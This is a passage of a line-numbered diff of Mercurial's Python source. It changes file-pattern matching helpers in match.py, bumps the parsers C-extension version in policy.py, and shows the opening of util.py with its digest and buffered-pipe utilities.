1207 1205 pat,
1208 1206 globsuffix
1209 1207 )
1210 1208 except rustext.filepatterns.PatternError:
1211 1209 raise error.ProgrammingError(
1212 1210 'not a regex pattern: %s:%s' % (kind, pat)
1213 1211 )
1214 1212
1215 1213 if not pat and kind in ('glob', 'relpath'):
1216 1214 return ''
1217 1215 if kind == 're':
1218 1216 return pat
1219 1217 if kind in ('path', 'relpath'):
1220 1218 if pat == '.':
1221 1219 return ''
1222 1220 return util.stringutil.reescape(pat) + '(?:/|$)'
1223 1221 if kind == 'rootfilesin':
1224 1222 if pat == '.':
1225 1223 escaped = ''
1226 1224 else:
1227 1225 # Pattern is a directory name.
1228 1226 escaped = util.stringutil.reescape(pat) + '/'
1229 1227 # Anything after the pattern must be a non-directory.
1230 1228 return escaped + '[^/]+$'
1231 1229 if kind == 'relglob':
1232 1230 return '(?:|.*/)' + _globre(pat) + globsuffix
1233 1231 if kind == 'relre':
1234 1232 if pat.startswith('^'):
1235 1233 return pat
1236 1234 return '.*' + pat
1237 1235 if kind in ('glob', 'rootglob'):
1238 1236 return _globre(pat) + globsuffix
1239 1237 raise error.ProgrammingError('not a regex pattern: %s:%s' % (kind, pat))
1240 1238
1241 1239 def _buildmatch(kindpats, globsuffix, root):
1242 1240 '''Return regexp string and a matcher function for kindpats.
1243 1241 globsuffix is appended to the regexp of globs.'''
1244 1242 matchfuncs = []
1245 1243
1246 1244 subincludes, kindpats = _expandsubinclude(kindpats, root)
1247 1245 if subincludes:
1248 1246 submatchers = {}
1249 1247 def matchsubinclude(f):
1250 1248 for prefix, matcherargs in subincludes:
1251 1249 if f.startswith(prefix):
1252 1250 mf = submatchers.get(prefix)
1253 1251 if mf is None:
1254 1252 mf = match(*matcherargs)
1255 1253 submatchers[prefix] = mf
1256 1254
1257 1255 if mf(f[len(prefix):]):
1258 1256 return True
1259 1257 return False
1260 1258 matchfuncs.append(matchsubinclude)
1261 1259
1262 1260 regex = ''
1263 1261 if kindpats:
1264 1262 if all(k == 'rootfilesin' for k, p, s in kindpats):
1265 1263 dirs = {p for k, p, s in kindpats}
1266 1264 def mf(f):
1267 1265 i = f.rfind('/')
1268 1266 if i >= 0:
1269 1267 dir = f[:i]
1270 1268 else:
1271 1269 dir = '.'
1272 1270 return dir in dirs
1273 1271 regex = b'rootfilesin: %s' % stringutil.pprint(list(sorted(dirs)))
1274 1272 matchfuncs.append(mf)
1275 1273 else:
1276 1274 regex, mf = _buildregexmatch(kindpats, globsuffix)
1277 1275 matchfuncs.append(mf)
1278 1276
1279 1277 if len(matchfuncs) == 1:
1280 1278 return regex, matchfuncs[0]
1281 1279 else:
1282 1280 return regex, lambda f: any(mf(f) for mf in matchfuncs)
1283 1281
1284 1282 MAX_RE_SIZE = 20000
1285 1283
1286 1284 def _joinregexes(regexps):
1287 1285 """gather multiple regular expressions into a single one"""
1288 1286 return '|'.join(regexps)
1289 1287
1290 1288 def _buildregexmatch(kindpats, globsuffix):
1291 1289 """Build a match function from a list of kinds and kindpats,
1292 1290 return regexp string and a matcher function.
1293 1291
1294 1292 Test too large input
1295 1293 >>> _buildregexmatch([
1296 1294 ... (b'relglob', b'?' * MAX_RE_SIZE, b'')
1297 1295 ... ], b'$')
1298 1296 Traceback (most recent call last):
1299 1297 ...
1300 1298 Abort: matcher pattern is too long (20009 bytes)
1301 1299 """
1302 1300 try:
1303 1301 allgroups = []
1304 1302 regexps = [_regex(k, p, globsuffix) for (k, p, s) in kindpats]
1305 1303 fullregexp = _joinregexes(regexps)
1306 1304
1307 1305 startidx = 0
1308 1306 groupsize = 0
1309 1307 for idx, r in enumerate(regexps):
1310 1308 piecesize = len(r)
1311 1309 if piecesize > MAX_RE_SIZE:
1312 1310 msg = _("matcher pattern is too long (%d bytes)") % piecesize
1313 1311 raise error.Abort(msg)
1314 1312 elif (groupsize + piecesize) > MAX_RE_SIZE:
1315 1313 group = regexps[startidx:idx]
1316 1314 allgroups.append(_joinregexes(group))
1317 1315 startidx = idx
1318 1316 groupsize = 0
1319 1317 groupsize += piecesize + 1
1320 1318
1321 1319 if startidx == 0:
1322 1320 matcher = _rematcher(fullregexp)
1323 1321 func = lambda s: bool(matcher(s))
1324 1322 else:
1325 1323 group = regexps[startidx:]
1326 1324 allgroups.append(_joinregexes(group))
1327 1325 allmatchers = [_rematcher(g) for g in allgroups]
1328 1326 func = lambda s: any(m(s) for m in allmatchers)
1329 1327 return fullregexp, func
1330 1328 except re.error:
1331 1329 for k, p, s in kindpats:
1332 1330 try:
1333 1331 _rematcher(_regex(k, p, globsuffix))
1334 1332 except re.error:
1335 1333 if s:
1336 1334 raise error.Abort(_("%s: invalid pattern (%s): %s") %
1337 1335 (s, k, p))
1338 1336 else:
1339 1337 raise error.Abort(_("invalid pattern (%s): %s") % (k, p))
1340 1338 raise error.Abort(_("invalid pattern"))
1341 1339
1342 1340 def _patternrootsanddirs(kindpats):
1343 1341 '''Returns roots and directories corresponding to each pattern.
1344 1342
1345 1343 This calculates the roots and directories exactly matching the patterns and
1346 1344 returns a tuple of (roots, dirs) for each. It does not return other
1347 1345 directories which may also need to be considered, like the parent
1348 1346 directories.
1349 1347 '''
1350 1348 r = []
1351 1349 d = []
1352 1350 for kind, pat, source in kindpats:
1353 1351 if kind in ('glob', 'rootglob'): # find the non-glob prefix
1354 1352 root = []
1355 1353 for p in pat.split('/'):
1356 1354 if '[' in p or '{' in p or '*' in p or '?' in p:
1357 1355 break
1358 1356 root.append(p)
1359 1357 r.append('/'.join(root))
1360 1358 elif kind in ('relpath', 'path'):
1361 1359 if pat == '.':
1362 1360 pat = ''
1363 1361 r.append(pat)
1364 1362 elif kind in ('rootfilesin',):
1365 1363 if pat == '.':
1366 1364 pat = ''
1367 1365 d.append(pat)
1368 1366 else: # relglob, re, relre
1369 1367 r.append('')
1370 1368 return r, d
1371 1369
1372 1370 def _roots(kindpats):
1373 1371 '''Returns root directories to match recursively from the given patterns.'''
1374 1372 roots, dirs = _patternrootsanddirs(kindpats)
1375 1373 return roots
1376 1374
1377 1375 def _rootsdirsandparents(kindpats):
1378 1376 '''Returns roots and exact directories from patterns.
1379 1377
1380 1378 `roots` are directories to match recursively, `dirs` should
1381 1379 be matched non-recursively, and `parents` are the implicitly required
1382 1380 directories to walk to items in either roots or dirs.
1383 1381
1384 1382 Returns a tuple of (roots, dirs, parents).
1385 1383
1386 1384 >>> _rootsdirsandparents(
1387 1385 ... [(b'glob', b'g/h/*', b''), (b'glob', b'g/h', b''),
1388 1386 ... (b'glob', b'g*', b'')])
1389 (['g/h', 'g/h', ''], [], ['g', ''])
1387 (['g/h', 'g/h', ''], [], ['', 'g'])
1390 1388 >>> _rootsdirsandparents(
1391 1389 ... [(b'rootfilesin', b'g/h', b''), (b'rootfilesin', b'', b'')])
1392 ([], ['g/h', ''], ['g', ''])
1390 ([], ['g/h', ''], ['', 'g'])
1393 1391 >>> _rootsdirsandparents(
1394 1392 ... [(b'relpath', b'r', b''), (b'path', b'p/p', b''),
1395 1393 ... (b'path', b'', b'')])
1396 (['r', 'p/p', ''], [], ['p', ''])
1394 (['r', 'p/p', ''], [], ['', 'p'])
1397 1395 >>> _rootsdirsandparents(
1398 1396 ... [(b'relglob', b'rg*', b''), (b're', b're/', b''),
1399 1397 ... (b'relre', b'rr', b'')])
1400 1398 (['', '', ''], [], [''])
1401 1399 '''
1402 1400 r, d = _patternrootsanddirs(kindpats)
1403 1401
1404 1402 p = []
1405 1403 # Append the parents as non-recursive/exact directories, since they must be
1406 1404 # scanned to get to either the roots or the other exact directories.
1407 1405 p.extend(util.dirs(d))
1408 1406 p.extend(util.dirs(r))
1409 # util.dirs() does not include the root directory, so add it manually
1410 p.append('')
1411 1407
1412 1408 # FIXME: all uses of this function convert these to sets, do so before
1413 1409 # returning.
1414 1410 # FIXME: all uses of this function do not need anything in 'roots' and
1415 1411 # 'dirs' to also be in 'parents', consider removing them before returning.
1416 1412 return r, d, p
1417 1413
1418 1414 def _explicitfiles(kindpats):
1419 1415 '''Returns the potential explicit filenames from the patterns.
1420 1416
1421 1417 >>> _explicitfiles([(b'path', b'foo/bar', b'')])
1422 1418 ['foo/bar']
1423 1419 >>> _explicitfiles([(b'rootfilesin', b'foo/bar', b'')])
1424 1420 []
1425 1421 '''
1426 1422 # Keep only the pattern kinds where one can specify filenames (vs only
1427 1423 # directory names).
1428 1424 filable = [kp for kp in kindpats if kp[0] not in ('rootfilesin',)]
1429 1425 return _roots(filable)
1430 1426
1431 1427 def _prefix(kindpats):
1432 1428 '''Whether all the patterns match a prefix (i.e. recursively)'''
1433 1429 for kind, pat, source in kindpats:
1434 1430 if kind not in ('path', 'relpath'):
1435 1431 return False
1436 1432 return True
1437 1433
1438 1434 _commentre = None
1439 1435
1440 1436 def readpatternfile(filepath, warn, sourceinfo=False):
1441 1437 '''parse a pattern file, returning a list of
1442 1438 patterns. These patterns should be given to compile()
1443 1439 to be validated and converted into a match function.
1444 1440
1445 1441 trailing white space is dropped.
1446 1442 the escape character is backslash.
1447 1443 comments start with #.
1448 1444 empty lines are skipped.
1449 1445
1450 1446 lines can be of the following formats:
1451 1447
1452 1448 syntax: regexp # defaults following lines to non-rooted regexps
1453 1449 syntax: glob # defaults following lines to non-rooted globs
1454 1450 re:pattern # non-rooted regular expression
1455 1451 glob:pattern # non-rooted glob
1456 1452 rootglob:pat # rooted glob (same root as ^ in regexps)
1457 1453 pattern # pattern of the current default type
1458 1454
1459 1455 if sourceinfo is set, returns a list of tuples:
1460 1456 (pattern, lineno, originalline).
1461 1457 This is useful to debug ignore patterns.
1462 1458 '''
1463 1459
1464 1460 if rustext is not None:
1465 1461 result, warnings = rustext.filepatterns.read_pattern_file(
1466 1462 filepath,
1467 1463 bool(warn),
1468 1464 sourceinfo,
1469 1465 )
1470 1466
1471 1467 for warning_params in warnings:
1472 1468 # Can't be easily emitted from Rust, because it would require
1473 1469 # a mechanism for both gettext and calling the `warn` function.
1474 1470 warn(_("%s: ignoring invalid syntax '%s'\n") % warning_params)
1475 1471
1476 1472 return result
1477 1473
1478 1474 syntaxes = {
1479 1475 're': 'relre:',
1480 1476 'regexp': 'relre:',
1481 1477 'glob': 'relglob:',
1482 1478 'rootglob': 'rootglob:',
1483 1479 'include': 'include',
1484 1480 'subinclude': 'subinclude',
1485 1481 }
1486 1482 syntax = 'relre:'
1487 1483 patterns = []
1488 1484
1489 1485 fp = open(filepath, 'rb')
1490 1486 for lineno, line in enumerate(util.iterfile(fp), start=1):
1491 1487 if "#" in line:
1492 1488 global _commentre
1493 1489 if not _commentre:
1494 1490 _commentre = util.re.compile(br'((?:^|[^\\])(?:\\\\)*)#.*')
1495 1491 # remove comments prefixed by an even number of escapes
1496 1492 m = _commentre.search(line)
1497 1493 if m:
1498 1494 line = line[:m.end(1)]
1499 1495 # fixup properly escaped comments that survived the above
1500 1496 line = line.replace("\\#", "#")
1501 1497 line = line.rstrip()
1502 1498 if not line:
1503 1499 continue
1504 1500
1505 1501 if line.startswith('syntax:'):
1506 1502 s = line[7:].strip()
1507 1503 try:
1508 1504 syntax = syntaxes[s]
1509 1505 except KeyError:
1510 1506 if warn:
1511 1507 warn(_("%s: ignoring invalid syntax '%s'\n") %
1512 1508 (filepath, s))
1513 1509 continue
1514 1510
1515 1511 linesyntax = syntax
1516 1512 for s, rels in syntaxes.iteritems():
1517 1513 if line.startswith(rels):
1518 1514 linesyntax = rels
1519 1515 line = line[len(rels):]
1520 1516 break
1521 1517 elif line.startswith(s+':'):
1522 1518 linesyntax = rels
1523 1519 line = line[len(s) + 1:]
1524 1520 break
1525 1521 if sourceinfo:
1526 1522 patterns.append((linesyntax + line, lineno, line))
1527 1523 else:
1528 1524 patterns.append(linesyntax + line)
1529 1525 fp.close()
1530 1526 return patterns
@@ -1,109 +1,109
1 1 # policy.py - module policy logic for Mercurial.
2 2 #
3 3 # Copyright 2015 Gregory Szorc <gregory.szorc@gmail.com>
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7 7
8 8 from __future__ import absolute_import
9 9
10 10 import os
11 11 import sys
12 12
13 13 # Rules for how modules can be loaded. Values are:
14 14 #
15 15 # c - require C extensions
16 16 # allow - allow pure Python implementation when C loading fails
17 17 # cffi - required cffi versions (implemented within pure module)
18 18 # cffi-allow - allow pure Python implementation if cffi version is missing
19 19 # py - only load pure Python modules
20 20 #
21 21 # By default, fall back to the pure modules so the in-place build can
22 22 # run without recompiling the C extensions. This will be overridden by
23 23 # __modulepolicy__ generated by setup.py.
24 24 policy = b'allow'
25 25 _packageprefs = {
26 26 # policy: (versioned package, pure package)
27 27 b'c': (r'cext', None),
28 28 b'allow': (r'cext', r'pure'),
29 29 b'cffi': (r'cffi', None),
30 30 b'cffi-allow': (r'cffi', r'pure'),
31 31 b'py': (None, r'pure'),
32 32 }
33 33
34 34 try:
35 35 from . import __modulepolicy__
36 36 policy = __modulepolicy__.modulepolicy
37 37 except ImportError:
38 38 pass
39 39
40 40 # PyPy doesn't load C extensions.
41 41 #
42 42 # The canonical way to do this is to test platform.python_implementation().
43 43 # But we don't import platform and don't bloat for it here.
44 44 if r'__pypy__' in sys.builtin_module_names:
45 45 policy = b'cffi'
46 46
47 47 # Environment variable can always force settings.
48 48 if sys.version_info[0] >= 3:
49 49 if r'HGMODULEPOLICY' in os.environ:
50 50 policy = os.environ[r'HGMODULEPOLICY'].encode(r'utf-8')
51 51 else:
52 52 policy = os.environ.get(r'HGMODULEPOLICY', policy)
53 53
54 54 def _importfrom(pkgname, modname):
55 55 # from .<pkgname> import <modname> (where . is looked through this module)
56 56 fakelocals = {}
57 57 pkg = __import__(pkgname, globals(), fakelocals, [modname], level=1)
58 58 try:
59 59 fakelocals[modname] = mod = getattr(pkg, modname)
60 60 except AttributeError:
61 61 raise ImportError(r'cannot import name %s' % modname)
62 62 # force import; fakelocals[modname] may be replaced with the real module
63 63 getattr(mod, r'__doc__', None)
64 64 return fakelocals[modname]
65 65
66 66 # keep in sync with "version" in C modules
67 67 _cextversions = {
68 68 (r'cext', r'base85'): 1,
69 69 (r'cext', r'bdiff'): 3,
70 70 (r'cext', r'mpatch'): 1,
71 71 (r'cext', r'osutil'): 4,
72 (r'cext', r'parsers'): 12,
72 (r'cext', r'parsers'): 13,
73 73 }
74 74
75 75 # map import request to other package or module
76 76 _modredirects = {
77 77 (r'cext', r'charencode'): (r'cext', r'parsers'),
78 78 (r'cffi', r'base85'): (r'pure', r'base85'),
79 79 (r'cffi', r'charencode'): (r'pure', r'charencode'),
80 80 (r'cffi', r'parsers'): (r'pure', r'parsers'),
81 81 }
82 82
83 83 def _checkmod(pkgname, modname, mod):
84 84 expected = _cextversions.get((pkgname, modname))
85 85 actual = getattr(mod, r'version', None)
86 86 if actual != expected:
87 87 raise ImportError(r'cannot import module %s.%s '
88 88 r'(expected version: %d, actual: %r)'
89 89 % (pkgname, modname, expected, actual))
90 90
91 91 def importmod(modname):
92 92 """Import module according to policy and check API version"""
93 93 try:
94 94 verpkg, purepkg = _packageprefs[policy]
95 95 except KeyError:
96 96 raise ImportError(r'invalid HGMODULEPOLICY %r' % policy)
97 97 assert verpkg or purepkg
98 98 if verpkg:
99 99 pn, mn = _modredirects.get((verpkg, modname), (verpkg, modname))
100 100 try:
101 101 mod = _importfrom(pn, mn)
102 102 if pn == verpkg:
103 103 _checkmod(pn, mn, mod)
104 104 return mod
105 105 except ImportError:
106 106 if not purepkg:
107 107 raise
108 108 pn, mn = _modredirects.get((purepkg, modname), (purepkg, modname))
109 109 return _importfrom(pn, mn)
@@ -1,3317 +1,3318
1 1 # util.py - Mercurial utility functions and platform specific implementations
2 2 #
3 3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 6 #
7 7 # This software may be used and distributed according to the terms of the
8 8 # GNU General Public License version 2 or any later version.
9 9
10 10 """Mercurial utility functions and platform specific implementations.
11 11
12 12 This contains helper routines that are independent of the SCM core and
13 13 hide platform-specific details from the core.
14 14 """
15 15
16 16 from __future__ import absolute_import, print_function
17 17
18 18 import abc
19 19 import collections
20 20 import contextlib
21 21 import errno
22 22 import gc
23 23 import hashlib
24 24 import itertools
25 25 import mmap
26 26 import os
27 27 import platform as pyplatform
28 28 import re as remod
29 29 import shutil
30 30 import socket
31 31 import stat
32 32 import sys
33 33 import time
34 34 import traceback
35 35 import warnings
36 36
37 37 from .thirdparty import (
38 38 attr,
39 39 )
40 40 from hgdemandimport import tracing
41 41 from . import (
42 42 encoding,
43 43 error,
44 44 i18n,
45 45 node as nodemod,
46 46 policy,
47 47 pycompat,
48 48 urllibcompat,
49 49 )
50 50 from .utils import (
51 51 compression,
52 52 procutil,
53 53 stringutil,
54 54 )
55 55
56 56 base85 = policy.importmod(r'base85')
57 57 osutil = policy.importmod(r'osutil')
58 58 parsers = policy.importmod(r'parsers')
59 59
60 60 b85decode = base85.b85decode
61 61 b85encode = base85.b85encode
62 62
63 63 cookielib = pycompat.cookielib
64 64 httplib = pycompat.httplib
65 65 pickle = pycompat.pickle
66 66 safehasattr = pycompat.safehasattr
67 67 socketserver = pycompat.socketserver
68 68 bytesio = pycompat.bytesio
69 69 # TODO deprecate stringio name, as it is a lie on Python 3.
70 70 stringio = bytesio
71 71 xmlrpclib = pycompat.xmlrpclib
72 72
73 73 httpserver = urllibcompat.httpserver
74 74 urlerr = urllibcompat.urlerr
75 75 urlreq = urllibcompat.urlreq
76 76
77 77 # workaround for win32mbcs
78 78 _filenamebytestr = pycompat.bytestr
79 79
80 80 if pycompat.iswindows:
81 81 from . import windows as platform
82 82 else:
83 83 from . import posix as platform
84 84
85 85 _ = i18n._
86 86
87 87 bindunixsocket = platform.bindunixsocket
88 88 cachestat = platform.cachestat
89 89 checkexec = platform.checkexec
90 90 checklink = platform.checklink
91 91 copymode = platform.copymode
92 92 expandglobs = platform.expandglobs
93 93 getfsmountpoint = platform.getfsmountpoint
94 94 getfstype = platform.getfstype
95 95 groupmembers = platform.groupmembers
96 96 groupname = platform.groupname
97 97 isexec = platform.isexec
98 98 isowner = platform.isowner
99 99 listdir = osutil.listdir
100 100 localpath = platform.localpath
101 101 lookupreg = platform.lookupreg
102 102 makedir = platform.makedir
103 103 nlinks = platform.nlinks
104 104 normpath = platform.normpath
105 105 normcase = platform.normcase
106 106 normcasespec = platform.normcasespec
107 107 normcasefallback = platform.normcasefallback
108 108 openhardlinks = platform.openhardlinks
109 109 oslink = platform.oslink
110 110 parsepatchoutput = platform.parsepatchoutput
111 111 pconvert = platform.pconvert
112 112 poll = platform.poll
113 113 posixfile = platform.posixfile
114 114 readlink = platform.readlink
115 115 rename = platform.rename
116 116 removedirs = platform.removedirs
117 117 samedevice = platform.samedevice
118 118 samefile = platform.samefile
119 119 samestat = platform.samestat
120 120 setflags = platform.setflags
121 121 split = platform.split
122 122 statfiles = getattr(osutil, 'statfiles', platform.statfiles)
123 123 statisexec = platform.statisexec
124 124 statislink = platform.statislink
125 125 umask = platform.umask
126 126 unlink = platform.unlink
127 127 username = platform.username
128 128
129 129 # small compat layer
130 130 compengines = compression.compengines
131 131 SERVERROLE = compression.SERVERROLE
132 132 CLIENTROLE = compression.CLIENTROLE
133 133
134 134 try:
135 135 recvfds = osutil.recvfds
136 136 except AttributeError:
137 137 pass
138 138
139 139 # Python compatibility
140 140
141 141 _notset = object()
142 142
143 143 def bitsfrom(container):
144 144 bits = 0
145 145 for bit in container:
146 146 bits |= bit
147 147 return bits
148 148
149 149 # python 2.6 still have deprecation warning enabled by default. We do not want
150 150 # to display anything to standard user so detect if we are running test and
151 151 # only use python deprecation warning in this case.
152 152 _dowarn = bool(encoding.environ.get('HGEMITWARNINGS'))
153 153 if _dowarn:
154 154 # explicitly unfilter our warning for python 2.7
155 155 #
156 156 # The option of setting PYTHONWARNINGS in the test runner was investigated.
157 157 # However, module name set through PYTHONWARNINGS was exactly matched, so
158 158 # we cannot set 'mercurial' and have it match eg: 'mercurial.scmutil'. This
159 159 # makes the whole PYTHONWARNINGS thing useless for our usecase.
160 160 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'mercurial')
161 161 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext')
162 162 warnings.filterwarnings(r'default', r'', DeprecationWarning, r'hgext3rd')
163 163 if _dowarn and pycompat.ispy3:
164 164 # silence warning emitted by passing user string to re.sub()
165 165 warnings.filterwarnings(r'ignore', r'bad escape', DeprecationWarning,
166 166 r'mercurial')
167 167 warnings.filterwarnings(r'ignore', r'invalid escape sequence',
168 168 DeprecationWarning, r'mercurial')
169 169 # TODO: reinvent imp.is_frozen()
170 170 warnings.filterwarnings(r'ignore', r'the imp module is deprecated',
171 171 DeprecationWarning, r'mercurial')
172 172
173 173 def nouideprecwarn(msg, version, stacklevel=1):
174 174 """Issue an python native deprecation warning
175 175
176 176 This is a noop outside of tests, use 'ui.deprecwarn' when possible.
177 177 """
178 178 if _dowarn:
179 179 msg += ("\n(compatibility will be dropped after Mercurial-%s,"
180 180 " update your code.)") % version
181 181 warnings.warn(pycompat.sysstr(msg), DeprecationWarning, stacklevel + 1)
182 182
183 183 DIGESTS = {
184 184 'md5': hashlib.md5,
185 185 'sha1': hashlib.sha1,
186 186 'sha512': hashlib.sha512,
187 187 }
188 188 # List of digest types from strongest to weakest
189 189 DIGESTS_BY_STRENGTH = ['sha512', 'sha1', 'md5']
190 190
191 191 for k in DIGESTS_BY_STRENGTH:
192 192 assert k in DIGESTS
193 193
194 194 class digester(object):
195 195 """helper to compute digests.
196 196
197 197 This helper can be used to compute one or more digests given their name.
198 198
199 199 >>> d = digester([b'md5', b'sha1'])
200 200 >>> d.update(b'foo')
201 201 >>> [k for k in sorted(d)]
202 202 ['md5', 'sha1']
203 203 >>> d[b'md5']
204 204 'acbd18db4cc2f85cedef654fccc4a4d8'
205 205 >>> d[b'sha1']
206 206 '0beec7b5ea3f0fdbc95d0dd47f3c5bc275da8a33'
207 207 >>> digester.preferred([b'md5', b'sha1'])
208 208 'sha1'
209 209 """
210 210
211 211 def __init__(self, digests, s=''):
212 212 self._hashes = {}
213 213 for k in digests:
214 214 if k not in DIGESTS:
215 215 raise error.Abort(_('unknown digest type: %s') % k)
216 216 self._hashes[k] = DIGESTS[k]()
217 217 if s:
218 218 self.update(s)
219 219
220 220 def update(self, data):
221 221 for h in self._hashes.values():
222 222 h.update(data)
223 223
224 224 def __getitem__(self, key):
225 225 if key not in DIGESTS:
226 226 raise error.Abort(_('unknown digest type: %s') % k)
227 227 return nodemod.hex(self._hashes[key].digest())
228 228
229 229 def __iter__(self):
230 230 return iter(self._hashes)
231 231
232 232 @staticmethod
233 233 def preferred(supported):
234 234 """returns the strongest digest type in both supported and DIGESTS."""
235 235
236 236 for k in DIGESTS_BY_STRENGTH:
237 237 if k in supported:
238 238 return k
239 239 return None
240 240
241 241 class digestchecker(object):
242 242 """file handle wrapper that additionally checks content against a given
243 243 size and digests.
244 244
245 245 d = digestchecker(fh, size, {'md5': '...'})
246 246
247 247 When multiple digests are given, all of them are validated.
248 248 """
249 249
250 250 def __init__(self, fh, size, digests):
251 251 self._fh = fh
252 252 self._size = size
253 253 self._got = 0
254 254 self._digests = dict(digests)
255 255 self._digester = digester(self._digests.keys())
256 256
257 257 def read(self, length=-1):
258 258 content = self._fh.read(length)
259 259 self._digester.update(content)
260 260 self._got += len(content)
261 261 return content
262 262
263 263 def validate(self):
264 264 if self._size != self._got:
265 265 raise error.Abort(_('size mismatch: expected %d, got %d') %
266 266 (self._size, self._got))
267 267 for k, v in self._digests.items():
268 268 if v != self._digester[k]:
269 269 # i18n: first parameter is a digest name
270 270 raise error.Abort(_('%s mismatch: expected %s, got %s') %
271 271 (k, v, self._digester[k]))
272 272
273 273 try:
274 274 buffer = buffer
275 275 except NameError:
276 276 def buffer(sliceable, offset=0, length=None):
277 277 if length is not None:
278 278 return memoryview(sliceable)[offset:offset + length]
279 279 return memoryview(sliceable)[offset:]
280 280
281 281 _chunksize = 4096
282 282
283 283 class bufferedinputpipe(object):
284 284 """a manually buffered input pipe
285 285
286 286 Python will not let us use buffered IO and lazy reading with 'polling' at
287 287 the same time. We cannot probe the buffer state and select will not detect
288 288 that data are ready to read if they are already buffered.
289 289
290 290 This class let us work around that by implementing its own buffering
291 291 (allowing efficient readline) while offering a way to know if the buffer is
292 292 empty from the output (allowing collaboration of the buffer with polling).
293 293
294 294 This class lives in the 'util' module because it makes use of the 'os'
295 295 module from the python stdlib.
296 296 """
297 297 def __new__(cls, fh):
298 298 # If we receive a fileobjectproxy, we need to use a variation of this
299 299 # class that notifies observers about activity.
300 300 if isinstance(fh, fileobjectproxy):
301 301 cls = observedbufferedinputpipe
302 302
303 303 return super(bufferedinputpipe, cls).__new__(cls)
304 304
305 305 def __init__(self, input):
306 306 self._input = input
307 307 self._buffer = []
308 308 self._eof = False
309 309 self._lenbuf = 0
310 310
311 311 @property
312 312 def hasbuffer(self):
313 313 """True is any data is currently buffered
314 314
315 315 This will be used externally a pre-step for polling IO. If there is
316 316 already data then no polling should be set in place."""
317 317 return bool(self._buffer)
318 318
319 319 @property
320 320 def closed(self):
321 321 return self._input.closed
322 322
323 323 def fileno(self):
324 324 return self._input.fileno()
325 325
326 326 def close(self):
327 327 return self._input.close()
328 328
329 329 def read(self, size):
330 330 while (not self._eof) and (self._lenbuf < size):
331 331 self._fillbuffer()
332 332 return self._frombuffer(size)
333 333
334 334 def unbufferedread(self, size):
335 335 if not self._eof and self._lenbuf == 0:
336 336 self._fillbuffer(max(size, _chunksize))
337 337 return self._frombuffer(min(self._lenbuf, size))
338 338
339 339 def readline(self, *args, **kwargs):
340 340 if len(self._buffer) > 1:
341 341 # this should not happen because both read and readline end with a
342 342 # _frombuffer call that collapse it.
343 343 self._buffer = [''.join(self._buffer)]
344 344 self._lenbuf = len(self._buffer[0])
345 345 lfi = -1
346 346 if self._buffer:
347 347 lfi = self._buffer[-1].find('\n')
348 348 while (not self._eof) and lfi < 0:
349 349 self._fillbuffer()
350 350 if self._buffer:
351 351 lfi = self._buffer[-1].find('\n')
352 352 size = lfi + 1
353 353 if lfi < 0: # end of file
354 354 size = self._lenbuf
355 355 elif len(self._buffer) > 1:
356 356 # we need to take previous chunks into account
357 357 size += self._lenbuf - len(self._buffer[-1])
358 358 return self._frombuffer(size)
359 359
360 360 def _frombuffer(self, size):
361 361 """return at most 'size' data from the buffer
362 362
363 363 The data are removed from the buffer."""
364 364 if size == 0 or not self._buffer:
365 365 return ''
366 366 buf = self._buffer[0]
367 367 if len(self._buffer) > 1:
368 368 buf = ''.join(self._buffer)
369 369
370 370 data = buf[:size]
371 371 buf = buf[len(data):]
372 372 if buf:
373 373 self._buffer = [buf]
374 374 self._lenbuf = len(buf)
375 375 else:
376 376 self._buffer = []
377 377 self._lenbuf = 0
378 378 return data
379 379
380 380 def _fillbuffer(self, size=_chunksize):
381 381 """read data to the buffer"""
382 382 data = os.read(self._input.fileno(), size)
383 383 if not data:
384 384 self._eof = True
385 385 else:
386 386 self._lenbuf += len(data)
387 387 self._buffer.append(data)
388 388
389 389 return data
390 390
391 391 def mmapread(fp):
392 392 try:
393 393 fd = getattr(fp, 'fileno', lambda: fp)()
394 394 return mmap.mmap(fd, 0, access=mmap.ACCESS_READ)
395 395 except ValueError:
396 396 # Empty files cannot be mmapped, but mmapread should still work. Check
397 397 # if the file is empty, and if so, return an empty buffer.
398 398 if os.fstat(fd).st_size == 0:
399 399 return ''
400 400 raise
401 401
402 402 class fileobjectproxy(object):
403 403 """A proxy around file objects that tells a watcher when events occur.
404 404
405 405 This type is intended to only be used for testing purposes. Think hard
406 406 before using it in important code.
407 407 """
408 408 __slots__ = (
409 409 r'_orig',
410 410 r'_observer',
411 411 )
412 412
413 413 def __init__(self, fh, observer):
414 414 object.__setattr__(self, r'_orig', fh)
415 415 object.__setattr__(self, r'_observer', observer)
416 416
417 417 def __getattribute__(self, name):
418 418 ours = {
419 419 r'_observer',
420 420
421 421 # IOBase
422 422 r'close',
423 423 # closed if a property
424 424 r'fileno',
425 425 r'flush',
426 426 r'isatty',
427 427 r'readable',
428 428 r'readline',
429 429 r'readlines',
430 430 r'seek',
431 431 r'seekable',
432 432 r'tell',
433 433 r'truncate',
434 434 r'writable',
435 435 r'writelines',
436 436 # RawIOBase
437 437 r'read',
438 438 r'readall',
439 439 r'readinto',
440 440 r'write',
441 441 # BufferedIOBase
442 442 # raw is a property
443 443 r'detach',
444 444 # read defined above
445 445 r'read1',
446 446 # readinto defined above
447 447 # write defined above
448 448 }
449 449
450 450 # We only observe some methods.
451 451 if name in ours:
452 452 return object.__getattribute__(self, name)
453 453
454 454 return getattr(object.__getattribute__(self, r'_orig'), name)
455 455
456 456 def __nonzero__(self):
457 457 return bool(object.__getattribute__(self, r'_orig'))
458 458
459 459 __bool__ = __nonzero__
460 460
461 461 def __delattr__(self, name):
462 462 return delattr(object.__getattribute__(self, r'_orig'), name)
463 463
464 464 def __setattr__(self, name, value):
465 465 return setattr(object.__getattribute__(self, r'_orig'), name, value)
466 466
467 467 def __iter__(self):
468 468 return object.__getattribute__(self, r'_orig').__iter__()
469 469
470 470 def _observedcall(self, name, *args, **kwargs):
471 471 # Call the original object.
472 472 orig = object.__getattribute__(self, r'_orig')
473 473 res = getattr(orig, name)(*args, **kwargs)
474 474
475 475 # Call a method on the observer of the same name with arguments
476 476 # so it can react, log, etc.
477 477 observer = object.__getattribute__(self, r'_observer')
478 478 fn = getattr(observer, name, None)
479 479 if fn:
480 480 fn(res, *args, **kwargs)
481 481
482 482 return res
483 483
